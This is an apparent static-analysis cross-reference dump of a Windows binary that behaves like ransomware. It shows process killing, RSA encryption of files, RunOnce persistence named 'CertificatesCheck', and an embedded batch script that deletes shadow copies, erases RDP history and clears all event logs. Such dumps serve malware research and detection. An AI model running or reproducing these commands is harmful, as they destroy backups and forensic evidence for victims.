reference_vaddr	symbol_addr	symbol_type	caller_function	data
0x4027af	0x4010d0	import	0x4027a9	KERNEL32.dll.GetProcessHeap
0x4027b6	0x4010d4	import	0x4027a9	KERNEL32.dll.HeapAlloc
0x4027c3	0x4010d0	import	0x4027bd	KERNEL32.dll.GetProcessHeap
0x4027ca	0x4010ac	import	0x4027bd	KERNEL32.dll.HeapFree
0x4027dd	0x4010d0	import	0x4027d1	KERNEL32.dll.GetProcessHeap
0x4027e4	0x4010d4	import	0x4027d1	KERNEL32.dll.HeapAlloc
0x4028e3	0x4028f0	string	0x4028de	;t$\fr
0x402938	0x4010d8	import	0x40292c	KERNEL32.dll.GetCommandLineA
0x402941	0x401028	import	0x40292c	KERNEL32.dll.lstrlenA
0x40294c	0x4010d0	import	0x40292c	KERNEL32.dll.GetProcessHeap
0x402953	0x4010d4	import	0x40292c	KERNEL32.dll.HeapAlloc
0x402961	0x402a1c	string	0x40292c	_^][
0x402969	0x40105c	import	0x40292c	KERNEL32.dll.lstrcpynA
0x4029c9	0x402a1c	string	0x40292c	_^][
0x402a10	0x402a1c	string	0x40292c	_^][
0x402b6b	0x402b7b	string	0x402ae0	+D$\f\eT$
0x402b71	0x402b7b	string	0x402ae0	+D$\f\eT$
0x402c71	0x4010b4	import	0x402c4e	KERNEL32.dll.CreateToolhelp32Snapshot
0x402c96	0x4010bc	import	0x402c4e	KERNEL32.dll.Process32FirstW
0x402caa	0x408849	string	0x402c4e	UVW3\v
0x402cb9	0x4010c0	import	0x402c4e	KERNEL32.dll.lstrlenW
0x402cdb	0x4010e4	import	0x402c4e	SHLWAPI.dll.StrStrA
0x402cfd	0x4010cc	import	0x402c4e	KERNEL32.dll.HeapCreate
0x402d0a	0x4010d4	import	0x402c4e	KERNEL32.dll.HeapAlloc
0x402d1f	0x4010f0	import	0x402c4e	USER32.dll.wsprintfA
0x402d2c	0x401ad4	string	0x402c4e	taskkill /F /T /PID
0x402d32	0x40106c	import	0x402c4e	KERNEL32.dll.lstrcpyA
0x402d3e	0x4010c4	import	0x402c4e	KERNEL32.dll.lstrcatA
0x402d61	0x4010c8	import	0x402c4e	KERNEL32.dll.CreateProcessA
0x402d70	0x4010b8	import	0x402c4e	KERNEL32.dll.Process32NextW
0x402d7f	0x4010b0	import	0x402c4e	KERNEL32.dll.CloseHandle
0x40395e	0x403b0c	string	0x4038e3	_^]3
0x403a27	0x403b0c	string	0x4038e3	_^]3
0x403aa3	0x403b0c	string	0x4038e3	_^]3
0x403d78	0x405ab7	string	0x403d3c	QQSVW
0x403eb8	0x405ab7	string	0x403e3f	QQSVW
0x403f6c	0x405ab7	string	0x403e3f	QQSVW
0x403fc2	0x405ab7	string	0x403e3f	QQSVW
0x404141	0x404df3	string	0x404113	QSUV
0x40418e	0x40452b	string	0x40416c	_^][
0x4042be	0x405ab7	string	0x40416c	QQSVW
0x404317	0x405ab7	string	0x40416c	QQSVW
0x40432c	0x405ab7	string	0x40416c	QQSVW
0x404352	0x405ab7	string	0x40416c	QQSVW
0x4043ab	0x405ab7	string	0x40416c	QQSVW
0x4043c0	0x405ab7	string	0x40416c	QQSVW
0x4045e8	0x405ab7	string	0x40457b	QQSVW
0x4045fd	0x405ab7	string	0x40457b	QQSVW
0x40462c	0x405ab7	string	0x40457b	QQSVW
0x40464a	0x405ab7	string	0x40457b	QQSVW
0x4046a2	0x405ab7	string	0x40457b	QQSVW
0x404d0c	0x404d12	string	0x404cb4	3҉T$ blocks=Basic Latin,Cyrillic
0x404d3b	0x405516	string	0x404cb4	QQSU
0x404d4e	0x405516	string	0x404cb4	QQSU
0x404e0a	0x404e9a	string	0x404df3	^][Y
0x404ebd	0x404f0a	string	0x404ea1	_^[Y
0x404f78	0x405379	string	0x404f55	_^][
0x404feb	0x405379	string	0x404f55	_^][
0x405128	0x405ab7	string	0x404f55	QQSVW
0x405314	0x405ab7	string	0x404f55	QQSVW
0x4054d6	0x405516	string	0x4053e8	QQSU
0x405894	0x4058ab	string	0x40585f	^_][
0x405b17	0x405b52	string	0x405ab7	]_^3
0x405b1e	0x405b52	string	0x405ab7	]_^3
0x405baf	0x405c26	string	0x405b6a	_^][
0x405cb2	0x405d83	string	0x405c8d	_^][
0x405da6	0x404df3	string	0x405d8d	QSUV
0x405dd6	0x405d8d	string	0x405d8d	QQSU
0x405e1f	0x401028	import	0x405e09	KERNEL32.dll.lstrlenA
0x4060fa	0x406130	string	0x4060cb	][_^
0x406246	0x406250	string	0x40622f	j03ۍD$,SP blocks=Basic Latin,Arabic
0x40624b	0x4062e3	string	0x40622f	_^][
0x40627b	0x4062e3	string	0x40622f	_^][
0x406313	0x40637f	string	0x4062ed	_^][
0x406532	0x4064ff	string	0x406423	3ҍL$ blocks=Basic Latin,Cyrillic
0x4068b2	0x40101c	import	0x406899	ADVAPI32.dll.CryptAcquireContextW
0x4068cc	0x401014	import	0x406899	ADVAPI32.dll.CryptGenRandom
0x4068da	0x401018	import	0x406899	ADVAPI32.dll.CryptReleaseContext
0x4068e3	0x4068ef	string	0x406899	^_[]
0x4068e5	0x401018	import	0x406899	ADVAPI32.dll.CryptReleaseContext
0x406b91	0x406b9a	string	0x406b8f	ËT$\b blocks=Latin-1 Supplement,Basic Latin
0x406bd7	0x407345	string	0x406b8f	VWj\e
0x406ce7	0x406cec	string	0x406cd6	QQSU
0x406d95	0x406da3	string	0x406cd6	_^][YY
0x406d9c	0x406da3	string	0x406cd6	_^][YY
0x406f9e	0x406fa9	string	0x406cd6	_^][
0x406fa2	0x406fa9	string	0x406cd6	_^][
0x406fd5	0x40708f	string	0x406fb3	_^][
0x406fea	0x40708f	string	0x406fb3	_^][
0x407002	0x40708f	string	0x406fb3	_^][
0x407012	0x40708f	string	0x406fb3	_^][
0x407034	0x40708f	string	0x406fb3	_^][
0x40704b	0x40708f	string	0x406fb3	_^][
0x407074	0x40708f	string	0x406fb3	_^][
0x407088	0x40708f	string	0x406fb3	_^][
0x4072f5	0x407300	string	0x407116	_^][
0x4072f9	0x407300	string	0x407116	_^][
0x407363	0x407338	string	0x407361	QjlX
0x4077b0	0x408849	string	0x4077a4	UVW3\v
0x407801	0x4010f8	import	0x4077a4	ole32.dll.CoCreateGuid
0x407816	0x4010fc	import	0x4077a4	ole32.dll.StringFromGUID2
0x407833	0x401034	import	0x4077a4	KERNEL32.dll.WideCharToMultiByte
0x407855	0x40103c	import	0x4077a4	KERNEL32.dll.CreateFileW
0x40786c	0x401040	import	0x4077a4	KERNEL32.dll.GetFileSizeEx
0x407890	0x401028	import	0x4077a4	KERNEL32.dll.lstrlenA
0x40791e	0x401028	import	0x4077a4	KERNEL32.dll.lstrlenA
0x407a29	0x402a30	string	0x4077a4	WVS3
0x407a5f	0x401038	import	0x4077a4	KERNEL32.dll.ReadFile
0x407abd	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407ae8	0x401038	import	0x4077a4	KERNEL32.dll.ReadFile
0x407b70	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407b9b	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407bb2	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407be5	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407bf8	0x401028	import	0x4077a4	KERNEL32.dll.lstrlenA
0x407c01	0x401030	import	0x4077a4	KERNEL32.dll.WriteFile
0x407c08	0x4010b0	import	0x4077a4	KERNEL32.dll.CloseHandle
0x407c4c	0x40102c	import	0x407c33	KERNEL32.dll.SetFilePointerEx
0x407c56	0x401044	import	0x407c33	KERNEL32.dll.GetLastError
0x407ce2	0x401048	import	0x407cdb	KERNEL32.dll.ExitProcess
0x407d0c	0x401080	import	0x407ce9	KERNEL32.dll.GetModuleFileNameW
0x407d12	0x40104c	import	0x407ce9	KERNEL32.dll.GetEnvironmentVariableW
0x407d1e	0x4026d8	string	0x407ce9	temp
0x407d3e	0x402220	string	0x407ce9	D09DEA80C4FCABC836C17675AD9CE20F8F09B685279387146C0DFC2229AB7423C27CDD621E779A3336E0859985F5D08148565392BD3B8E7AD4E8A836CE17D31797B83645E8792EED94584B32F7BA9B38DA621F47996E60AF0CBC715FF3F692316E85925E45FD2654C97044C539711C1124E44B965BE917C690BD0C0D8C6B6472E3AA56456ECA3A200241F9A0AEF8C0D3F39E23791DFD095A787CE4A7877A41B59782E607C4F98D223C14D8B1D213239FE67D637931B76D7D4D0443C3BFEDD819EAEC2F421CA87821E085EC6861065C1CBFDB1A255ABD0204004AD3CBBD3ABFBA179FFEE964A27198E1FC867871579175B8E3BB69109FEA14ABA64609617F9449
0x407d44	0x40105c	import	0x407ce9	KERNEL32.dll.lstrcpynA
0x407d72	0x408698	string	0x407ce9	UVW3\v
0x407d90	0x4081f3	string	0x407ce9	SUVW
0x407db0	0x4081f3	string	0x407ce9	SUVW
0x407dd1	0x4081f3	string	0x407ce9	SUVW
0x407df1	0x4026e4	string	0x407ce9	appdata
0x407dfe	0x401048	import	0x407ce9	KERNEL32.dll.ExitProcess
0x407e04	0x401098	import	0x407ce9	KERNEL32.dll.lstrcatW
0x407e1a	0x4010e8	import	0x407ce9	SHLWAPI.dll.PathFindFileNameW
0x407e34	0x401094	import	0x407ce9	KERNEL32.dll.lstrcmpiW
0x407e58	0x401078	import	0x407ce9	KERNEL32.dll.CopyFileW
0x407e7c	0x4026f4	string	0x407ce9	public
0x407e90	0x402704	string	0x407ce9	ALLUSERSPROFILE
0x407ea4	0x408698	string	0x407ce9	UVW3\v
0x407ea9	0x4010a4	import	0x407ce9	KERNEL32.dll.lstrcpyW
0x407edc	0x401004	import	0x407ce9	ADVAPI32.dll.GetCurrentHwProfileW
0x407f62	0x401074	import	0x407ce9	KERNEL32.dll.Sleep
0x407fae	0x402724	string	0x407ce9	{{IDENTIFIER}}
0x407fb5	0x4010e4	import	0x407ce9	SHLWAPI.dll.StrStrA
0x407fc6	0x401028	import	0x407ce9	KERNEL32.dll.lstrlenA
0x408031	0x401088	import	0x407ce9	KERNEL32.dll.GetStdHandle
0x408068	0x40103c	import	0x40804f	KERNEL32.dll.CreateFileW
0x408075	0x401044	import	0x40804f	KERNEL32.dll.GetLastError
0x40807b	0x4080da	string	0x40804f	_^][
0x40807d	0x401044	import	0x40804f	KERNEL32.dll.GetLastError
0x40809a	0x40106c	import	0x40804f	KERNEL32.dll.lstrcpyA
0x4080a5	0x401058	import	0x40804f	KERNEL32.dll.SetFilePointer
0x4080bd	0x401030	import	0x40804f	KERNEL32.dll.WriteFile
0x4080d2	0x4010b0	import	0x40804f	KERNEL32.dll.CloseHandle
0x40815a	0x402620	string	0x40813f	Software\Microsoft\Windows\CurrentVersion\RunOnce
0x408168	0x401008	import	0x40813f	ADVAPI32.dll.RegOpenKeyExW
0x408170	0x4081e8	string	0x40813f	_^][
0x408186	0x402684	string	0x40813f	CertificatesCheck
0x40818f	0x40100c	import	0x40813f	ADVAPI32.dll.RegQueryValueExW
0x40819b	0x401094	import	0x40813f	KERNEL32.dll.lstrcmpiW
0x4081b7	0x401010	import	0x40813f	ADVAPI32.dll.RegCreateKeyExW
0x4081c2	0x4010c0	import	0x40813f	KERNEL32.dll.lstrlenW
0x4081cf	0x402684	string	0x40813f	CertificatesCheck
0x4081d8	0x401020	import	0x40813f	ADVAPI32.dll.RegSetValueExW
0x4081e2	0x401000	import	0x40813f	ADVAPI32.dll.RegCloseKey
0x40820f	0x401028	import	0x4081f3	KERNEL32.dll.lstrlenA
0x40822f	0x4010cc	import	0x4081f3	KERNEL32.dll.HeapCreate
0x40823f	0x4010d4	import	0x4081f3	KERNEL32.dll.HeapAlloc
0x408291	0x4010d0	import	0x408281	KERNEL32.dll.GetProcessHeap
0x408298	0x4010d4	import	0x408281	KERNEL32.dll.HeapAlloc
0x4082a0	0x401068	import	0x408281	KERNEL32.dll.GetLogicalDrives
0x4082d9	0x401070	import	0x408281	KERNEL32.dll.GetDriveTypeA
0x4082f9	0x4010d0	import	0x408281	KERNEL32.dll.GetProcessHeap
0x408300	0x4010d4	import	0x408281	KERNEL32.dll.HeapAlloc
0x408311	0x40106c	import	0x408281	KERNEL32.dll.lstrcpyA
0x40832c	0x40108c	import	0x408281	KERNEL32.dll.lstrcmpiA
0x40835e	0x408698	string	0x40834c	UVW3\v
0x408369	0x408e37	string	0x40834c	SVWj\b
0x408379	0x40856c	string	0x40834c	_^][
0x40837f	0x401098	import	0x40834c	KERNEL32.dll.lstrcatW
0x408385	0x401094	import	0x40834c	KERNEL32.dll.lstrcmpiW
0x4083a3	0x4010c0	import	0x40834c	KERNEL32.dll.lstrlenW
0x4083cb	0x401054	import	0x40834c	KERNEL32.dll.FindFirstFileW
0x408421	0x408849	string	0x40834c	UVW3\v
0x408433	0x408714	string	0x40834c	QQSU3ۉL$\fVW blocks=Basic Latin,Arabic
0x40845a	0x408e37	string	0x40834c	SVWj\b
0x408465	0x408714	string	0x40834c	QQSU3ۉL$\fVW blocks=Basic Latin,Arabic
0x40849f	0x4010e8	import	0x40834c	SHLWAPI.dll.PathFindFileNameW
0x4084c9	0x4010a8	import	0x40834c	KERNEL32.dll.SetFileAttributesW
0x4084d5	0x408714	string	0x40834c	QQSU3ۉL$\fVW blocks=Basic Latin,Arabic
0x4084fb	0x4010a4	import	0x40834c	KERNEL32.dll.lstrcpyW
0x408523	0x401064	import	0x40834c	KERNEL32.dll.MoveFileExW
0x408546	0x40109c	import	0x40834c	KERNEL32.dll.FindNextFileW
0x408555	0x401090	import	0x40834c	KERNEL32.dll.FindClose
0x40857f	0x4010e0	import	0x408579	SHLWAPI.dll.PathRemoveFileSpecW
0x408585	0x401098	import	0x408579	KERNEL32.dll.lstrcatW
0x4085b9	0x40103c	import	0x408579	KERNEL32.dll.CreateFileW
0x4085d5	0x401028	import	0x408579	KERNEL32.dll.lstrlenA
0x4085e3	0x401030	import	0x408579	KERNEL32.dll.WriteFile
0x4085ea	0x4010b0	import	0x408579	KERNEL32.dll.CloseHandle
0x4085f6	0x40107c	import	0x4085f5	KERNEL32.dll.GetFileAttributesW
0x40862b	0x401050	import	0x408608	KERNEL32.dll.GetTempFileNameW
0x408631	0x4025f0	string	0x408608	.bat
0x40863d	0x401098	import	0x408608	KERNEL32.dll.lstrcatW
0x408659	0x40103c	import	0x408608	KERNEL32.dll.CreateFileW
0x40866a	0x402428	string	0x408608	@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f\r\nreg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f\r\nreg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"\r\ncd %userprofile%\documents\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
0x408671	0x401028	import	0x408608	KERNEL32.dll.lstrlenA
0x40867a	0x401030	import	0x408608	KERNEL32.dll.WriteFile
0x408681	0x4010b0	import	0x408608	KERNEL32.dll.CloseHandle
0x4086a7	0x401084	import	0x408698	KERNEL32.dll.MultiByteToWideChar
0x4086c6	0x401084	import	0x408698	KERNEL32.dll.MultiByteToWideChar
0x408708	0x401060	import	0x4086d2	KERNEL32.dll.CreateProcessW
0x408772	0x401028	import	0x408714	KERNEL32.dll.lstrlenA
0x40877e	0x401028	import	0x408714	KERNEL32.dll.lstrlenA
0x40878c	0x401028	import	0x408714	KERNEL32.dll.lstrlenA
0x40879c	0x401028	import	0x408714	KERNEL32.dll.lstrlenA
0x4087a5	0x40108c	import	0x408714	KERNEL32.dll.lstrcmpiA
0x408859	0x401034	import	0x408849	KERNEL32.dll.WideCharToMultiByte
0x408875	0x401034	import	0x408849	KERNEL32.dll.WideCharToMultiByte
0x408957	0x401028	import	0x408950	KERNEL32.dll.lstrlenA
0x408961	0x4088e1	string	0x408950	QSUVW
0x408a49	0x401028	import	0x4089fe	KERNEL32.dll.lstrlenA
0x408a73	0x401030	import	0x4089fe	KERNEL32.dll.WriteFile
0x408acb	0x402740	string	0x408a92	rsa_genkey
0x408ad1	0x401028	import	0x408a92	KERNEL32.dll.lstrlenA
0x408c2f	0x402220	string	0x408a92	D09DEA80C4FCABC836C17675AD9CE20F8F09B685279387146C0DFC2229AB7423C27CDD621E779A3336E0859985F5D08148565392BD3B8E7AD4E8A836CE17D31797B83645E8792EED94584B32F7BA9B38DA621F47996E60AF0CBC715FF3F692316E85925E45FD2654C97044C539711C1124E44B965BE917C690BD0C0D8C6B6472E3AA56456ECA3A200241F9A0AEF8C0D3F39E23791DFD095A787CE4A7877A41B59782E607C4F98D223C14D8B1D213239FE67D637931B76D7D4D0443C3BFEDD819EAEC2F421CA87821E085EC6861065C1CBFDB1A255ABD0204004AD3CBBD3ABFBA179FFEE964A27198E1FC867871579175B8E3BB69109FEA14ABA64609617F9449
0x408c96	0x408982	string	0x408a92	SUVW
0x408d01	0x402734	string	0x408ca8	rsa_encrypt
0x408d07	0x401028	import	0x408ca8	KERNEL32.dll.lstrlenA
0x408d39	0x402218	string	0x408ca8	010001
0x408de9	0x4010c0	import	0x408de4	KERNEL32.dll.lstrlenW
0x408e01	0x4010a4	import	0x408de4	KERNEL32.dll.lstrcpyW
0x408e20	0x4010a4	import	0x408e0c	KERNEL32.dll.lstrcpyW
